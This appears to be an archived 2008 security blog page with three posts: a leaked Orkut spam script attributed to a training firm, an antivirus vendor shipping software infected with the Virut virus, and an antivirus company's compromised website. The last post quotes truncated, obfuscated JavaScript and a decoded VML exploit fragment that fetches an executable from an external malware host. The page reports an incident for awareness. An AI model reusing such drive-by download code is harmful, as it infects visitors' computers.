Archive for February, 2008

Orkut Spam is in the wild…….

Posted in Uncategorized on February 21, 2008 by ianstarkc

Yesterday someone reported that malicious javascript is circulating in the wild which results lots of spam to the Orkut users for the Innobuzz courses details.I contacted to the author of  blog  and he gave me shocking reply what he got.

This is Rohit. Im the person responsible for developing the Orkut script  ( Anybody who wants to sue this is the buddy) which you are taking about.

First let me tell you that I would have done the same as what you have done if I were in your shoes but our company has not at all created this script. The script which we created is available here:  Website_name .This was circulated in closed environment within a few friends to show how orkut can be used for spamming purposes. (It means Innobuzz is  teaching how to spam through Orkut!! Under US Law to teach like that is illegal and subjected to punishment) However, it seems that someone has made a copy of the script, changed the title to something which appeals to everyone and let it free on orkut.


That’s hilaroius!! Through out my past six years of  experience in Information Security and Cyber Law this is first and foremost important fact ” Security concern through internal threats within company”. There are lots of papers out on internet for protecting company  environment through internal threats. This is also one example of that if is it so. According to Rohit Sharma of InnoBuzz , that script was just a demo  in their internal and limited environment and somebody copied and circulated resulting spam DDOS of their website. Is it legal to  present  demo with Live social networking website “Orkut” and where is the limitation?
That’s more worst, they are teaching “Ethical hacking” like courses and they don’t know how to give demo? I am of opinion that they did intentionally for advertisement anyway here you can find more info about that script.

UPDATE: “Finally, Google has closed the website and the script” – Rohit Sharma
                       Close the Company as well  !!!!! 🙂

Advertisements

Antivirus company selling infected Antivirus software !!!!!!!!!

Posted in Uncategorized on February 12, 2008 by ianstarkc

It’s again “VIRUT”

This time Pune(INDIA) based antivirus company is serving the antivirus which itself is infected with “Virut” virus.

Read more Info at:  Here

Antivirus company website is infected!!!

Posted in Uncategorized on February 6, 2008 by ianstarkc

UPDATE(08/02): Malicious IFRAME has been removed . So Web-admins  should have knowledge of all various method of attacks  and keep update & audit their site/server.

What do you think if an antivirus company’s website itself infecting the users? Well that’s the most alarming situation about web-security and problem of surfing suppose-to-be trusted website. 
The same happened to Delhi (India) based  AVsoft Technologies’s antivirus website http://www.s-cop.com.
Their product “SmartCop Antivirus” is capable to detect malwares!

Infection is carried by exploiting common vulnerabilites using encrypted script. In this case it is like

<script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,37,11,46,55,34,16,14,60,58,0,0,0,0,0,0,18,24,29,45,6,38,48,41,61,50,33,17);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(“gPjEXVXIadA4ie8IN0zSARiSdT8eNqcLfhpMNhiIpq8vnqCIoVX5DypIW……….

which decryptes to

<html xmlns:v=”urn:schemas-microsoft-com:vml”><head>
<object id=”VMLRender” classid=”CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E”>
</object>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id=”myDivA”></div> 
<script language=”JavaScript”>  
 function bxdbSGIA(Z0gP3oql, Bwpp5g4P)
 {
  while (Z0gP3oql.length*2<Bwpp5g4P)  ….

function Attack(n)
 {…
‘<param name=”src” value=” http://ntkrnlpa[dot]info/rc/exe[dot]
………
Just see the screenshots below…

4.jpg

3.jpg

2.jpg

This all is used by the infamous (underground networks!!) tool “IcePack” . You can see below the admin console

1.jpg

Already reported to concerned authorities.